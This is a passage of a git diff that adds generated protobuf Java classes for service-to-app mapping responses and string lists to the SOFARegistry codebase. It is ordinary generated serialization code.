throw new com.google.protobuf.InvalidProtocolBufferException(e).setUnfinishedMessage(this); + } finally { + this.unknownFields = unknownFields.build(); + makeExtensionsImmutable(); + } + } + + public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_ServiceAppMappingResponse_descriptor; + } + + @SuppressWarnings({"rawtypes"}) + protected com.google.protobuf.MapField internalGetMapField(int number) { + switch (number) { + case 1: + return internalGetServiceAppMapping(); + default: + throw new RuntimeException("Invalid map field number: " + number); + } + } + + protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internalGetFieldAccessorTable() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_ServiceAppMappingResponse_fieldAccessorTable + .ensureFieldAccessorsInitialized( + com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingResponse.class, + com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingResponse.Builder + .class); + } + + private int bitField0_; + public static final int SERVICEAPPMAPPING_FIELD_NUMBER = 1; + + private static final class ServiceAppMappingDefaultEntryHolder { + static final com.google.protobuf.MapEntry< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.AppList> + defaultEntry = + com.google.protobuf.MapEntry + . + newDefaultInstance( + com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_ServiceAppMappingResponse_ServiceAppMappingEntry_descriptor, + com.google.protobuf.WireFormat.FieldType.STRING, + "", + com.google.protobuf.WireFormat.FieldType.MESSAGE, + com.alipay.sofa.registry.common.model.client.pb.AppList + .getDefaultInstance()); + } + + private com.google.protobuf.MapField< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.AppList> + serviceAppMapping_; + + private com.google.protobuf.MapField< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.AppList> + internalGetServiceAppMapping() { + if (serviceAppMapping_ == null) { + return com.google.protobuf.MapField.emptyMapField( + ServiceAppMappingDefaultEntryHolder.defaultEntry); + } + return serviceAppMapping_; + } + + public int getServiceAppMappingCount() { + return internalGetServiceAppMapping().getMap().size(); + } + /** map<string, .AppList> serviceAppMapping = 1; */ + public boolean containsServiceAppMapping(java.lang.String key) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + return internalGetServiceAppMapping().getMap().containsKey(key); + } + /** Use {@link #getServiceAppMappingMap()} instead. */ + @java.lang.Deprecated + public java.util.Map + getServiceAppMapping() { + return getServiceAppMappingMap(); + } + /** map<string, .AppList> serviceAppMapping = 1; */ + public java.util.Map + getServiceAppMappingMap() { + return internalGetServiceAppMapping().getMap(); + } + /** map<string, .AppList> serviceAppMapping = 1; */ + public com.alipay.sofa.registry.common.model.client.pb.AppList getServiceAppMappingOrDefault( + java.lang.String key, com.alipay.sofa.registry.common.model.client.pb.AppList defaultValue) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + java.util.Map map = + internalGetServiceAppMapping().getMap(); + return map.containsKey(key) ? map.get(key) : defaultValue; + } + /** map<string, .AppList> serviceAppMapping = 1; */ + public com.alipay.sofa.registry.common.model.client.pb.AppList getServiceAppMappingOrThrow( + java.lang.String key) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + java.util.Map map = + internalGetServiceAppMapping().getMap(); + if (!map.containsKey(key)) { + throw new java.lang.IllegalArgumentException(); + } + return map.get(key); + } + + public static final int STATUSCODE_FIELD_NUMBER = 2; + private int statusCode_; + /** int32 statusCode = 2; */ + public int getStatusCode() { + return statusCode_; + } + + public static final int MESSAGE_FIELD_NUMBER = 3; + private volatile java.lang.Object message_; + /** string message = 3; */ + public java.lang.String getMessage() { + java.lang.Object ref = message_; + if (ref instanceof java.lang.String) { + return (java.lang.String) ref; + } else { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + message_ = s; + return s; + } + } + /** string message = 3; */ + public com.google.protobuf.ByteString getMessageBytes() { + java.lang.Object ref = message_; + if (ref instanceof java.lang.String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + message_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + + private byte memoizedIsInitialized = -1; + + public final boolean isInitialized() { + byte isInitialized = memoizedIsInitialized; + if (isInitialized == 1) return true; + if (isInitialized == 0) return false; + + memoizedIsInitialized = 1; + return true; + } + + public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { + com.google.protobuf.GeneratedMessageV3.serializeStringMapTo( + output, + internalGetServiceAppMapping(), + ServiceAppMappingDefaultEntryHolder.defaultEntry, + 1); + if (statusCode_ != 0) { + output.writeInt32(2, statusCode_); + } + if (!getMessageBytes().isEmpty()) { + com.google.protobuf.GeneratedMessageV3.writeString(output, 3, message_); + } + unknownFields.writeTo(output); + } + + public int getSerializedSize() { + int size = memoizedSize; + if (size != -1) return size; + + size = 0; + for (java.util.Map.Entry< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.AppList> + entry : internalGetServiceAppMapping().getMap().entrySet()) { + com.google.protobuf.MapEntry< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.AppList> + serviceAppMapping__ = + ServiceAppMappingDefaultEntryHolder.defaultEntry + .newBuilderForType() + .setKey(entry.getKey()) + .setValue(entry.getValue()) + .build(); + size += com.google.protobuf.CodedOutputStream.computeMessageSize(1, serviceAppMapping__); + } + if (statusCode_ != 0) { + size += com.google.protobuf.CodedOutputStream.computeInt32Size(2, statusCode_); + } + if (!getMessageBytes().isEmpty()) { + size += com.google.protobuf.GeneratedMessageV3.computeStringSize(3, message_); + } + size += unknownFields.getSerializedSize(); + memoizedSize = size; + return size; + } + + @java.lang.Override + public boolean equals(final java.lang.Object obj) { + if (obj == this) { + return true; + } + if (!(obj + instanceof com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingResponse)) { + return super.equals(obj); + } + com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingResponse other = + (com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingResponse) obj; + + boolean result = true; + result = result && internalGetServiceAppMapping().equals(other.internalGetServiceAppMapping()); + result = result && (getStatusCode() == other.getStatusCode()); + result = result && getMessage().equals(other.getMessage()); + result = result && unknownFields.equals(other.unknownFields); + return result; + } + + @java.lang.Override + public int hashCode() { + if (memoizedHashCode != 0) { + return memoizedHashCode; + } + int hash = 41; + hash = (19 * hash) + getDescriptor().hashCode(); + if (!internalGetServiceAppMapping().getMap().isEmpty()) { + hash = (37 * hash) + SERVICEAPPMAPPING_FIELD_NUMBER; + hash = (53 * hash) + internalGetServiceAppMapping().hashCode(); + } + hash = (37 * hash) + STATUSCODE_FIELD_NUMBER; + hash = (53 * hash) + getStatusCode(); + hash = (37 * hash) + MESSAGE_FIELD_NUMBER; + hash = (53 * hash) + getMessage().hashCode(); + hash = (29 * hash) + unknownFields.hashCode(); + memoizedHashCode = hash; + return hash; + } + + public static com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingResponse parseFrom( + java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingResponse parseFrom( + java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingResponse parseFrom( + com.google.protobuf.ByteString data) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingResponse parseFrom( + com.google.protobuf.ByteString data, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingResponse parseFrom( + byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingResponse parseFrom( + byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingResponse parseFrom( + java.io.InputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingResponse parseFrom( + java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException( + PARSER, input, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingResponse + parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingResponse + parseDelimitedFrom( + java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( + PARSER, input, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingResponse parseFrom( + com.google.protobuf.CodedInputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingResponse parseFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException( + PARSER, input, extensionRegistry); + } + + public Builder newBuilderForType() { + return newBuilder(); + } + + public static Builder newBuilder() { + return DEFAULT_INSTANCE.toBuilder(); + } + + public static Builder newBuilder( + com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingResponse prototype) { + return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); + } + + public Builder toBuilder() { + return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); + } + + @java.lang.Override + protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { + Builder builder = new Builder(parent); + return builder; + } + /** Protobuf type {@code ServiceAppMappingResponse} */ + public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder + implements + // @@protoc_insertion_point(builder_implements:ServiceAppMappingResponse) + com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingResponseOrBuilder { + public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_ServiceAppMappingResponse_descriptor; + } + + @SuppressWarnings({"rawtypes"}) + protected com.google.protobuf.MapField internalGetMapField(int number) { + switch (number) { + case 1: + return internalGetServiceAppMapping(); + default: + throw new RuntimeException("Invalid map field number: " + number); + } + } + + @SuppressWarnings({"rawtypes"}) + protected com.google.protobuf.MapField internalGetMutableMapField(int number) { + switch (number) { + case 1: + return internalGetMutableServiceAppMapping(); + default: + throw new RuntimeException("Invalid map field number: " + number); + } + } + + protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internalGetFieldAccessorTable() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_ServiceAppMappingResponse_fieldAccessorTable + .ensureFieldAccessorsInitialized( + com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingResponse.class, + com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingResponse.Builder + .class); + } + + // Construct using + // com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingResponse.newBuilder() + private Builder() { + maybeForceBuilderInitialization(); + } + + private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { + super(parent); + maybeForceBuilderInitialization(); + } + + private void maybeForceBuilderInitialization() { + if (com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders) {} + } + + public Builder clear() { + super.clear(); + internalGetMutableServiceAppMapping().clear(); + statusCode_ = 0; + + message_ = ""; + + return this; + } + + public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_ServiceAppMappingResponse_descriptor; + } + + public com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingResponse + getDefaultInstanceForType() { + return com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingResponse + .getDefaultInstance(); + } + + public com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingResponse build() { + com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingResponse result = + buildPartial(); + if (!result.isInitialized()) { + throw newUninitializedMessageException(result); + } + return result; + } + + public com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingResponse + buildPartial() { + com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingResponse result = + new com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingResponse(this); + int from_bitField0_ = bitField0_; + int to_bitField0_ = 0; + result.serviceAppMapping_ = internalGetServiceAppMapping(); + result.serviceAppMapping_.makeImmutable(); + result.statusCode_ = statusCode_; + result.message_ = message_; + result.bitField0_ = to_bitField0_; + onBuilt(); + return result; + } + + public Builder clone() { + return (Builder) super.clone(); + } + + public Builder setField( + com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { + return (Builder) super.setField(field, value); + } + + public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { + return (Builder) super.clearField(field); + } + + public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { + return (Builder) super.clearOneof(oneof); + } + + public Builder setRepeatedField( + com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { + return (Builder) super.setRepeatedField(field, index, value); + } + + public Builder addRepeatedField( + com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { + return (Builder) super.addRepeatedField(field, value); + } + + public Builder mergeFrom(com.google.protobuf.Message other) { + if (other + instanceof com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingResponse) { + return mergeFrom( + (com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingResponse) other); + } else { + super.mergeFrom(other); + return this; + } + } + + public Builder mergeFrom( + com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingResponse other) { + if (other + == com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingResponse + .getDefaultInstance()) return this; + internalGetMutableServiceAppMapping().mergeFrom(other.internalGetServiceAppMapping()); + if (other.getStatusCode() != 0) { + setStatusCode(other.getStatusCode()); + } + if (!other.getMessage().isEmpty()) { + message_ = other.message_; + onChanged(); + } + this.mergeUnknownFields(other.unknownFields); + onChanged(); + return this; + } + + public final boolean isInitialized() { + return true; + } + + public Builder mergeFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingResponse parsedMessage = + null; + try { + parsedMessage = PARSER.parsePartialFrom(input, extensionRegistry); + } catch (com.google.protobuf.InvalidProtocolBufferException e) { + parsedMessage = + (com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingResponse) + e.getUnfinishedMessage(); + throw e.unwrapIOException(); + } finally { + if (parsedMessage != null) { + mergeFrom(parsedMessage); + } + } + return this; + } + + private int bitField0_; + + private com.google.protobuf.MapField< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.AppList> + serviceAppMapping_; + + private com.google.protobuf.MapField< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.AppList> + internalGetServiceAppMapping() { + if (serviceAppMapping_ == null) { + return com.google.protobuf.MapField.emptyMapField( + ServiceAppMappingDefaultEntryHolder.defaultEntry); + } + return serviceAppMapping_; + } + + private com.google.protobuf.MapField< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.AppList> + internalGetMutableServiceAppMapping() { + onChanged(); + ; + if (serviceAppMapping_ == null) { + serviceAppMapping_ = + com.google.protobuf.MapField.newMapField( + ServiceAppMappingDefaultEntryHolder.defaultEntry); + } + if (!serviceAppMapping_.isMutable()) { + serviceAppMapping_ = serviceAppMapping_.copy(); + } + return serviceAppMapping_; + } + + public int getServiceAppMappingCount() { + return internalGetServiceAppMapping().getMap().size(); + } + /** map<string, .AppList> serviceAppMapping = 1; */ + public boolean containsServiceAppMapping(java.lang.String key) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + return internalGetServiceAppMapping().getMap().containsKey(key); + } + /** Use {@link #getServiceAppMappingMap()} instead. */ + @java.lang.Deprecated + public java.util.Map + getServiceAppMapping() { + return getServiceAppMappingMap(); + } + /** map<string, .AppList> serviceAppMapping = 1; */ + public java.util.Map + getServiceAppMappingMap() { + return internalGetServiceAppMapping().getMap(); + } + /** map<string, .AppList> serviceAppMapping = 1; */ + public com.alipay.sofa.registry.common.model.client.pb.AppList getServiceAppMappingOrDefault( + java.lang.String key, + com.alipay.sofa.registry.common.model.client.pb.AppList defaultValue) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + java.util.Map map = + internalGetServiceAppMapping().getMap(); + return map.containsKey(key) ? map.get(key) : defaultValue; + } + /** map<string, .AppList> serviceAppMapping = 1; */ + public com.alipay.sofa.registry.common.model.client.pb.AppList getServiceAppMappingOrThrow( + java.lang.String key) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + java.util.Map map = + internalGetServiceAppMapping().getMap(); + if (!map.containsKey(key)) { + throw new java.lang.IllegalArgumentException(); + } + return map.get(key); + } + + public Builder clearServiceAppMapping() { + internalGetMutableServiceAppMapping().getMutableMap().clear(); + return this; + } + /** map<string, .AppList> serviceAppMapping = 1; */ + public Builder removeServiceAppMapping(java.lang.String key) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + internalGetMutableServiceAppMapping().getMutableMap().remove(key); + return this; + } + /** Use alternate mutation accessors instead. */ + @java.lang.Deprecated + public java.util.Map + getMutableServiceAppMapping() { + return internalGetMutableServiceAppMapping().getMutableMap(); + } + /** map<string, .AppList> serviceAppMapping = 1; */ + public Builder putServiceAppMapping( + java.lang.String key, com.alipay.sofa.registry.common.model.client.pb.AppList value) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + if (value == null) { + throw new java.lang.NullPointerException(); + } + internalGetMutableServiceAppMapping().getMutableMap().put(key, value); + return this; + } + /** map<string, .AppList> serviceAppMapping = 1; */ + public Builder putAllServiceAppMapping( + java.util.Map + values) { + internalGetMutableServiceAppMapping().getMutableMap().putAll(values); + return this; + } + + private int statusCode_; + /** int32 statusCode = 2; */ + public int getStatusCode() { + return statusCode_; + } + /** int32 statusCode = 2; */ + public Builder setStatusCode(int value) { + + statusCode_ = value; + onChanged(); + return this; + } + /** int32 statusCode = 2; */ + public Builder clearStatusCode() { + + statusCode_ = 0; + onChanged(); + return this; + } + + private java.lang.Object message_ = ""; + /** string message = 3; */ + public java.lang.String getMessage() { + java.lang.Object ref = message_; + if (!(ref instanceof java.lang.String)) { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + message_ = s; + return s; + } else { + return (java.lang.String) ref; + } + } + /** string message = 3; */ + public com.google.protobuf.ByteString getMessageBytes() { + java.lang.Object ref = message_; + if (ref instanceof String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + message_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + /** string message = 3; */ + public Builder setMessage(java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + + message_ = value; + onChanged(); + return this; + } + /** string message = 3; */ + public Builder clearMessage() { + + message_ = getDefaultInstance().getMessage(); + onChanged(); + return this; + } + /** string message = 3; */ + public Builder setMessageBytes(com.google.protobuf.ByteString value) { + if (value == null) { + throw new NullPointerException(); + } + checkByteStringIsUtf8(value); + + message_ = value; + onChanged(); + return this; + } + + public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { + return super.setUnknownFieldsProto3(unknownFields); + } + + public final Builder mergeUnknownFields( + final com.google.protobuf.UnknownFieldSet unknownFields) { + return super.mergeUnknownFields(unknownFields); + } + + // @@protoc_insertion_point(builder_scope:ServiceAppMappingResponse) + } + + // @@protoc_insertion_point(class_scope:ServiceAppMappingResponse) + private static final com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingResponse + DEFAULT_INSTANCE; + + static { + DEFAULT_INSTANCE = + new com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingResponse(); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingResponse + getDefaultInstance() { + return DEFAULT_INSTANCE; + } + + private static final com.google.protobuf.Parser PARSER = + new com.google.protobuf.AbstractParser() { + public ServiceAppMappingResponse parsePartialFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return new ServiceAppMappingResponse(input, extensionRegistry); + } + }; + + public static com.google.protobuf.Parser parser() { + return PARSER; + } + + @java.lang.Override + public com.google.protobuf.Parser getParserForType() { + return PARSER; + } + + public com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingResponse + getDefaultInstanceForType() { + return DEFAULT_INSTANCE; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/ServiceAppMappingResponseOrBuilder.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/ServiceAppMappingResponseOrBuilder.java new file mode 100644 index 000000000..b64bf1e78 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/ServiceAppMappingResponseOrBuilder.java @@ -0,0 +1,49 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +public interface ServiceAppMappingResponseOrBuilder + extends + // @@protoc_insertion_point(interface_extends:ServiceAppMappingResponse) + com.google.protobuf.MessageOrBuilder { + + /** map<string, .AppList> serviceAppMapping = 1; */ + int getServiceAppMappingCount(); + /** map<string, .AppList> serviceAppMapping = 1; */ + boolean containsServiceAppMapping(java.lang.String key); + /** Use {@link #getServiceAppMappingMap()} instead. */ + @java.lang.Deprecated + java.util.Map + getServiceAppMapping(); + /** map<string, .AppList> serviceAppMapping = 1; */ + java.util.Map + getServiceAppMappingMap(); + /** map<string, .AppList> serviceAppMapping = 1; */ + com.alipay.sofa.registry.common.model.client.pb.AppList getServiceAppMappingOrDefault( + java.lang.String key, com.alipay.sofa.registry.common.model.client.pb.AppList defaultValue); + /** map<string, .AppList> serviceAppMapping = 1; */ + com.alipay.sofa.registry.common.model.client.pb.AppList getServiceAppMappingOrThrow( + java.lang.String key); + + /** int32 statusCode = 2; */ + int getStatusCode(); + + /** string message = 3; */ + java.lang.String getMessage(); + /** string message = 3; */ + com.google.protobuf.ByteString getMessageBytes(); +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/StringList.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/StringList.java new file mode 100644 index 000000000..bdf8ac5ca --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/StringList.java @@ -0,0 +1,551 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +/** Protobuf type {@code StringList} */ +public final class StringList extends com.google.protobuf.GeneratedMessageV3 + implements + // @@protoc_insertion_point(message_implements:StringList) + StringListOrBuilder { + private static final long serialVersionUID = 0L; + // Use StringList.newBuilder() to construct. + private StringList(com.google.protobuf.GeneratedMessageV3.Builder builder) { + super(builder); + } + + private StringList() { + values_ = com.google.protobuf.LazyStringArrayList.EMPTY; + } + + @java.lang.Override + public final com.google.protobuf.UnknownFieldSet getUnknownFields() { + return this.unknownFields; + } + + private StringList( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + this(); + if (extensionRegistry == null) { + throw new java.lang.NullPointerException(); + } + int mutable_bitField0_ = 0; + com.google.protobuf.UnknownFieldSet.Builder unknownFields = + com.google.protobuf.UnknownFieldSet.newBuilder(); + try { + boolean done = false; + while (!done) { + int tag = input.readTag(); + switch (tag) { + case 0: + done = true; + break; + default: + { + if (!parseUnknownFieldProto3(input, unknownFields, extensionRegistry, tag)) { + done = true; + } + break; + } + case 10: + { + java.lang.String s = input.readStringRequireUtf8(); + if (!((mutable_bitField0_ & 0x00000001) == 0x00000001)) { + values_ = new com.google.protobuf.LazyStringArrayList(); + mutable_bitField0_ |= 0x00000001; + } + values_.add(s); + break; + } + } + } + } catch (com.google.protobuf.InvalidProtocolBufferException e) { + throw e.setUnfinishedMessage(this); + } catch (java.io.IOException e) { + throw new com.google.protobuf.InvalidProtocolBufferException(e).setUnfinishedMessage(this); + } finally { + if (((mutable_bitField0_ & 0x00000001) == 0x00000001)) { + values_ = values_.getUnmodifiableView(); + } + this.unknownFields = unknownFields.build(); + makeExtensionsImmutable(); + } + } + + public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_StringList_descriptor; + } + + protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internalGetFieldAccessorTable() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_StringList_fieldAccessorTable + .ensureFieldAccessorsInitialized( + com.alipay.sofa.registry.common.model.client.pb.StringList.class, + com.alipay.sofa.registry.common.model.client.pb.StringList.Builder.class); + } + + public static final int VALUES_FIELD_NUMBER = 1; + private com.google.protobuf.LazyStringList values_; + /** repeated string values = 1; */ + public com.google.protobuf.ProtocolStringList getValuesList() { + return values_; + } + /** repeated string values = 1; */ + public int getValuesCount() { + return values_.size(); + } + /** repeated string values = 1; */ + public java.lang.String getValues(int index) { + return values_.get(index); + } + /** repeated string values = 1; */ + public com.google.protobuf.ByteString getValuesBytes(int index) { + return values_.getByteString(index); + } + + private byte memoizedIsInitialized = -1; + + public final boolean isInitialized() { + byte isInitialized = memoizedIsInitialized; + if (isInitialized == 1) return true; + if (isInitialized == 0) return false; + + memoizedIsInitialized = 1; + return true; + } + + public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { + for (int i = 0; i < values_.size(); i++) { + com.google.protobuf.GeneratedMessageV3.writeString(output, 1, values_.getRaw(i)); + } + unknownFields.writeTo(output); + } + + public int getSerializedSize() { + int size = memoizedSize; + if (size != -1) return size; + + size = 0; + { + int dataSize = 0; + for (int i = 0; i < values_.size(); i++) { + dataSize += computeStringSizeNoTag(values_.getRaw(i)); + } + size += dataSize; + size += 1 * getValuesList().size(); + } + size += unknownFields.getSerializedSize(); + memoizedSize = size; + return size; + } + + @java.lang.Override + public boolean equals(final java.lang.Object obj) { + if (obj == this) { + return true; + } + if (!(obj instanceof com.alipay.sofa.registry.common.model.client.pb.StringList)) { + return super.equals(obj); + } + com.alipay.sofa.registry.common.model.client.pb.StringList other = + (com.alipay.sofa.registry.common.model.client.pb.StringList) obj; + + boolean result = true; + result = result && getValuesList().equals(other.getValuesList()); + result = result && unknownFields.equals(other.unknownFields); + return result; + } + + @java.lang.Override + public int hashCode() { + if (memoizedHashCode != 0) { + return memoizedHashCode; + } + int hash = 41; + hash = (19 * hash) + getDescriptor().hashCode(); + if (getValuesCount() > 0) { + hash = (37 * hash) + VALUES_FIELD_NUMBER; + hash = (53 * hash) + getValuesList().hashCode(); + } + hash = (29 * hash) + unknownFields.hashCode(); + memoizedHashCode = hash; + return hash; + } + + public static com.alipay.sofa.registry.common.model.client.pb.StringList parseFrom( + java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.StringList parseFrom( + java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.StringList parseFrom( + com.google.protobuf.ByteString data) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.StringList parseFrom( + com.google.protobuf.ByteString data, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + 